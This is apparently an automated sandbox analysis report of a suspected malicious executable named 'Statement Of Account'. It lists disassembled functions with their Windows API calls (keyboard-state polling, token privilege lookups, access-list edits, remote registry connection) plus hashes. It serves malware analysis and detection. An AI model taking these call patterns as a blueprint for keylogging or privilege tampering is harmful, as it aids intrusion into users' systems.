Instruction Fuzzy Hash: 4E119671944701AFD720EF76C905B9EBBE0AF00714F10495FE469A6391DB78A580CB1D

Function 0044920C Relevance: 18.2, APIs: 12, Instructions: 243windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000000,000000FF,?), ref: 0044931D
SendMessageW.USER32(?,0045BBB0,00000000,00000000), ref: 0044932D
CharNextW.USER32(?,?,?,?,0045BBB0,00000000,00000000,?,?), ref: 00449361
SendMessageW.USER32(?,?,00000000,00000000), ref: 00449375
SendMessageW.USER32(?,00000402,?), ref: 0044941C
SendMessageW.USER32(004A83D8,000000C2,00000001,?), ref: 004494A0
SendMessageW.USER32(?,00001002,00000000,?), ref: 00449515

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: MessageSend$CharNext
String ID:
API String ID: 1350042424-0
Opcode ID: 5fd89deb92f75c0e0d7406111af65340a6b95ffecf1ba9c2db83920ef449de6e
Instruction ID: cf19a455924c4199ae2d31ef2e344bdd2865620a2145bd440d1f5c61272ee54d
Opcode Fuzzy Hash: 5fd89deb92f75c0e0d7406111af65340a6b95ffecf1ba9c2db83920ef449de6e
Instruction Fuzzy Hash: 5D81B5312083019BE720DF15DC85FBBB7E4EBD9B20F00492EFA54962C0D7B99946D766

Function 00453B94 Relevance: 18.2, APIs: 12, Instructions: 188keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,?,00000000), ref: 00453C0D
SetKeyboardState.USER32(?), ref: 00453C5A
GetAsyncKeyState.USER32(000000A0), ref: 00453C82
GetKeyState.USER32(000000A0), ref: 00453C99
GetAsyncKeyState.USER32(000000A1), ref: 00453CC9
GetKeyState.USER32(000000A1), ref: 00453CDA
GetAsyncKeyState.USER32(00000011), ref: 00453D07
GetKeyState.USER32(00000011), ref: 00453D15
GetAsyncKeyState.USER32(00000012), ref: 00453D3F
GetKeyState.USER32(00000012), ref: 00453D4D
GetAsyncKeyState.USER32(0000005B), ref: 00453D77
GetKeyState.USER32(0000005B), ref: 00453D85

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 439544d7db57c6269f5a832870b7215b314e2d5ec2fc8731d7b6f8ebe45629c5
Instruction ID: 09d2c23b2f41f951af40c960ff4fa7a39ed3d74d48f5bb091813d5d41b5bf946
Opcode Fuzzy Hash: 439544d7db57c6269f5a832870b7215b314e2d5ec2fc8731d7b6f8ebe45629c5
Instruction Fuzzy Hash: BD5108311497C42AF731EF6048217A7BBE45F52782F488D5EE9C107283E619AB0C976B

Function 00437DB1 Relevance: 18.2, APIs: 12, Instructions: 180COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 00437DD7
GetWindowRect.USER32(00000000,?), ref: 00437DE9
MoveWindow.USER32(00000000,0000000A,?,?,?,00000000), ref: 00437E5C
GetDlgItem.USER32(?,00000002), ref: 00437E70
GetWindowRect.USER32(00000000,?), ref: 00437E82
MoveWindow.USER32(00000000,?,00000000,?,?,00000000), ref: 00437EDB
GetDlgItem.USER32(?,000003E9), ref: 00437EEA
GetWindowRect.USER32(00000000,?), ref: 00437EFC
MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00437F46
GetDlgItem.USER32(?,000003EA), ref: 00437F55
MoveWindow.USER32(00000000,0000000A,0000000A,?,-000000FB,00000000), ref: 00437F6E
InvalidateRect.USER32(?,00000000,00000001), ref: 00437F78

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: 85b2574db82c4a067caaf632f6dab2f3668a9f7fdedc9eb4d1c33f4a9692aa02
Instruction ID: 6334a21bf5495bf578199e0a0c43900503e40640961724061e29feeedb49a886
Opcode Fuzzy Hash: 85b2574db82c4a067caaf632f6dab2f3668a9f7fdedc9eb4d1c33f4a9692aa02
Instruction Fuzzy Hash: 46511CB16083069FC318DF68DD85A2BB7E9ABC8300F144A2DF985D3391E6B4ED058B95

Function 00445FE0 Relevance: 18.2, APIs: 12, Instructions: 179COMMON

Download Yara Rule

APIs

Part of subcall function 004392BC: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 004392DE
Part of subcall function 004392BC: GetLastError.KERNEL32 ref: 004392E4
Part of subcall function 004392BC: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0043930B

Part of subcall function 0043928B: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004392A5

GetSecurityDescriptorDacl.ADVAPI32(?,00000004,?,?,?,?), ref: 00446058
_memset.LIBCMT ref: 0044606E
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00446090
GetLengthSid.ADVAPI32(?), ref: 0044609F
GetAce.ADVAPI32(?,00000000,?,?,00000018), ref: 004460EB
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00446108
GetLengthSid.ADVAPI32(?,?,00000018), ref: 0044611E
GetLengthSid.ADVAPI32(?,00000008,?,?,00000000,?,00000000), ref: 00446146
CopySid.ADVAPI32(00000000,?,00000000,?,00000000), ref: 0044614D
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?,?,00000000,?,00000000), ref: 0044617B
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000,?,00000000,?,00000000), ref: 00446198
SetUserObjectSecurity.USER32(?,?,?), ref: 004461AD

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 3490752873-0
Opcode ID: 60ddec0b823d9dccee76e0b19ae3e25d4b5cdc56ae74de37ec568c4d549045ed
Instruction ID: 6705534afb2254d4be0c2c823b23c38c51139504ad1b154a69e4490a01b962f7
Opcode Fuzzy Hash: 60ddec0b823d9dccee76e0b19ae3e25d4b5cdc56ae74de37ec568c4d549045ed
Instruction Fuzzy Hash: 8A51C071108341ABD310DF61CD84E6FB7EDAF8AB40F08491EFA9597242D779E904CB6A

Function 00436879 Relevance: 18.1, APIs: 12, Instructions: 115COMMON

Download Yara Rule

APIs

_wcschr.LIBCMT ref: 00436896
_wcscpy.LIBCMT ref: 004368A4
__wsplitpath.LIBCMT ref: 004368DA
__wsplitpath.LIBCMT ref: 00436900
_wcscpy.LIBCMT ref: 0043691E
_wcscpy.LIBCMT ref: 00436940
_wcscpy.LIBCMT ref: 00436951
_wcscat.LIBCMT ref: 0043695F
_wcscat.LIBCMT ref: 004369C6
_wcscat.LIBCMT ref: 004369FB
_wcscat.LIBCMT ref: 00436A0C

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
String ID:
API String ID: 136442275-0
Opcode ID: 8bb1124220d8f68122d0f1a8633f784f40ed2a0c71bdd1f95919e960fb23027d
Instruction ID: e47e2093bf76b35e8f1fec89578fc46911e8a4506192668d3a16ce6d5165f020
Opcode Fuzzy Hash: 8bb1124220d8f68122d0f1a8633f784f40ed2a0c71bdd1f95919e960fb23027d
Instruction Fuzzy Hash: 744124B2408345ABC235E754C885EEF73ECABD8314F44891EB68D42141EB796688C7A7

Function 0046B39A Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 401registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B479

Strings

HH, xrefs: 0046B3D0

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: ConnectRegistry_wcslen
String ID: HH
API String ID: 535477410-2761332787
Opcode ID: cc03a81e182be6ba1e7ee8022fe76587c4fcfc5607386b983ff95d826003d501
Instruction ID: 7a368be733395892e28f24b11b3b05e85d853a2cd395d98498a1c99032eed9d9
Opcode Fuzzy Hash: cc03a81e182be6ba1e7ee8022fe76587c4fcfc5607386b983ff95d826003d501
Instruction Fuzzy Hash: 63E171B1604200ABC714EF28C981F1BB7E4EF88704F148A1EF685DB381D779E945CB9A

Function 00460473 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 255COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000400), ref: 004604B5
GetWindowTextW.USER32(?,?,00000400), ref: 004604F1
_wcslen.LIBCMT ref: 00460502
CharUpperBuffW.USER32(?,00000000), ref: 00460510
GetClassNameW.USER32(?,?,00000400), ref: 00460589
GetWindowTextW.USER32(?,?,00000400), ref: 004605C2
GetClassNameW.USER32(?,?,00000400), ref: 00460606
GetClassNameW.USER32(?,?,00000400), ref: 0046063E
GetWindowRect.USER32(?,?), ref: 004606AD

Strings

ThumbnailClass, xrefs: 00460594, 0046060D

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen
String ID: ThumbnailClass
API String ID: 4123061591-1241985126
Opcode ID: d81b9eb1014bf0c552f647121340d293adfb5e43e55e37c5a686eb3c785bede7
Instruction ID: b645ef8d54a60b7d8a856e9fdf4d8999e4c56e3b903fe9b51be5921097eabf2a
Opcode Fuzzy Hash: d81b9eb1014bf0c552f647121340d293adfb5e43e55e37c5a686eb3c785bede7
Instruction Fuzzy Hash: 3F91B0715043019FDB14DF24C884BAB77A8EF84715F04896FFD85AA281E778E905CBAB

Function 0045FF4F Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 139COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,0042B612,?,0000138C,?), ref: 0045FFDF
LoadStringW.USER32(00000000), ref: 0045FFE2

Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF), ref: 00460005
LoadStringW.USER32(00000000), ref: 00460008
__swprintf.LIBCMT ref: 00460044
__swprintf.LIBCMT ref: 0046005A
_printf.LIBCMT ref: 0046010D

Strings

^ ERROR, xrefs: 004600AE
Error: , xrefs: 004600D2
Line %d:, xrefs: 0046003E
%s (%d) : ==> %s: %s %s, xrefs: 00460108

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: HandleLoadModuleString__swprintf$_printf_wcslen
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d:$^ ERROR
API String ID: 4046238252-2561132961
Opcode ID: 3a0ba83e73347f9d66d327fa194003f337c112eb025fc1bfa34d21ba4accb515
Instruction ID: 1782bf699798572b532e289ec277df613d4b2535fc1d09db4cdff265272d1083
Opcode Fuzzy Hash: 3a0ba83e73347f9d66d327fa194003f337c112eb025fc1bfa34d21ba4accb515
Instruction Fuzzy Hash: 7041EA725043059BC300FB61DC96A5F77A8DF91358F45093EB540A72D2EA7CDD09876B

Function 004393E2 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 109threadCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000008,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00439409
OpenThreadToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?), ref: 0043940C
GetCurrentProcess.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?), ref: 0043941D
OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?), ref: 00439420
LookupPrivilegeValueW.ADVAPI32(00000000,SeAssignPrimaryTokenPrivilege,?), ref: 0043945B
LookupPrivilegeValueW.ADVAPI32(00000000,SeIncreaseQuotaPrivilege,?), ref: 00439474
_memcmp.LIBCMT ref: 004394A9
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004394F8

Strings

SeIncreaseQuotaPrivilege, xrefs: 0043946A
SeAssignPrimaryTokenPrivilege, xrefs: 00439455

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: Process$CurrentLookupOpenPrivilegeTokenValue$CloseHandleThread_memcmp
String ID: SeAssignPrimaryTokenPrivilege$SeIncreaseQuotaPrivilege
API String ID: 1446985595-805462909
Opcode ID: 7b5964ebc210eec24af21402e2b7f40e95def761f5b1447ed6d44f65f7ea18b7
Instruction ID: 628aaead06b6f58e004e5b45c2ed9710a22b4d2b921ab75b424857e8fd72c9d6
Opcode Fuzzy Hash: 7b5964ebc210eec24af21402e2b7f40e95def761f5b1447ed6d44f65f7ea18b7
Instruction Fuzzy Hash: DB31A371508312ABC710DF21CD41AAFB7E8FB99704F04591EF98193240E7B8DD4ACBAA

Function 0045D83D Relevance: 17.6, APIs: 3, Strings: 7, Instructions: 86COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0045D848
GetDriveTypeW.KERNEL32(?,?), ref: 0045D8A3
SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D94A

Strings

RAMDisk, xrefs: 0045D901
Fixed, xrefs: 0045D8D1
Network, xrefs: 0045D8E1
CDROM, xrefs: 0045D8F1
Unknown, xrefs: 0045D911
Removable, xrefs: 0045D8C1
HH, xrefs: 0045D921

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: CDROM$Fixed$Network$RAMDisk$Removable$Unknown$HH
API String ID: 2907320926-41864084
Opcode ID: f2537af69be7bdfb8cd077d5fba63d09357e4425d7c4eca9e5473fe3d57dd33a
Instruction ID: d4cab332979e247f8c2da9788294718902473fa09eb5ff996f03d25688ce9cbb
Opcode Fuzzy Hash: f2537af69be7bdfb8cd077d5fba63d09357e4425d7c4eca9e5473fe3d57dd33a
Instruction Fuzzy Hash: C7318B75A083008FC310EF65E48481EB7A1AFC8315F648D2FF945A7362C779D9068BAB

Function 00467214 Relevance: 16.8, APIs: 11, Instructions: 313COMMON

Download Yara Rule

APIs

SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 004672E6
SafeArrayUnaccessData.OLEAUT32(CE8B7824), ref: 0046735D
SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 00467375
SafeArrayUnaccessData.OLEAUT32(CE8B7824), ref: 004673ED
SafeArrayGetVartype.OLEAUT32(CE8B7824,?), ref: 00467418
SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 00467445
SafeArrayUnaccessData.OLEAUT32(CE8B7824), ref: 0046746A
SafeArrayUnaccessData.OLEAUT32(CE8B7824), ref: 00467559
SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 0046748A

Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779

SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 00467571
SafeArrayUnaccessData.OLEAUT32(CE8B7824), ref: 004675E4

Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: ArraySafe$Data$AccessUnaccess$Exception@8ThrowVartype_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
String ID:
API String ID: 1932665248-0
Opcode ID: 2f069d425a14989955c91583bf1eee78d18cf75f4644af0e6fd4452b58d9bd04
Instruction ID: 42a0e90c8bf2b482c85e144861ec280134e9fb1dbd9e00a0d693b148f8e5f150
Opcode Fuzzy Hash: 2f069d425a14989955c91583bf1eee78d18cf75f4644af0e6fd4452b58d9bd04
Instruction Fuzzy Hash: E8B1BF752082009FD304DF29C884B6B77E5FF98318F14496EE98587362E779E885CB6B

Function 0046FB53 Relevance: 16.7, APIs: 11, Instructions: 176windowCOMMON

Download Yara Rule

APIs

ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 0046FB61
ExtractIconExW.SHELL32(?,000000FF,?,?,00000001), ref: 0046FB7A
SendMessageW.USER32 ref: 0046FBAF
SendMessageW.USER32 ref: 0046FBE2
SendMessageW.USER32(?,00001003,00000001,00000000), ref: 0046FC3E
SendMessageW.USER32(?,00001003,00000000,00000000), ref: 0046FC73
SendMessageW.USER32 ref: 0046FD00

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: MessageSend$ExtractIcon
String ID:
API String ID: 2741346921-0
Opcode ID: 84d296b218fe0245d687438722339ecf4745b7249032fe4bb2113eafbff2dc59
Instruction ID: f8b2170a3f6480226351c2682443129a31dd3945ebd2779c8b18a40e734619f9
Opcode Fuzzy Hash: 84d296b218fe0245d687438722339ecf4745b7249032fe4bb2113eafbff2dc59
Instruction Fuzzy Hash: A461BF70208305AFD320DF14DC85F5BB7E4FB89B14F10492EFA85972D1E7B4A8498B66

Function 00444D52 Relevance: 16.6, APIs: 11, Instructions: 132keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,?,?), ref: 00444D8A
GetAsyncKeyState.USER32(000000A0), ref: 00444E0F
GetKeyState.USER32(000000A0), ref: 00444E26
GetAsyncKeyState.USER32(000000A1), ref: 00444E40
GetKeyState.USER32(000000A1), ref: 00444E51
GetAsyncKeyState.USER32(00000011), ref: 00444E69
GetKeyState.USER32(00000011), ref: 00444E77
GetAsyncKeyState.USER32(00000012), ref: 00444E8F
GetKeyState.USER32(00000012), ref: 00444E9D
GetAsyncKeyState.USER32(0000005B), ref: 00444EB5
GetKeyState.USER32(0000005B), ref: 00444EC3

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
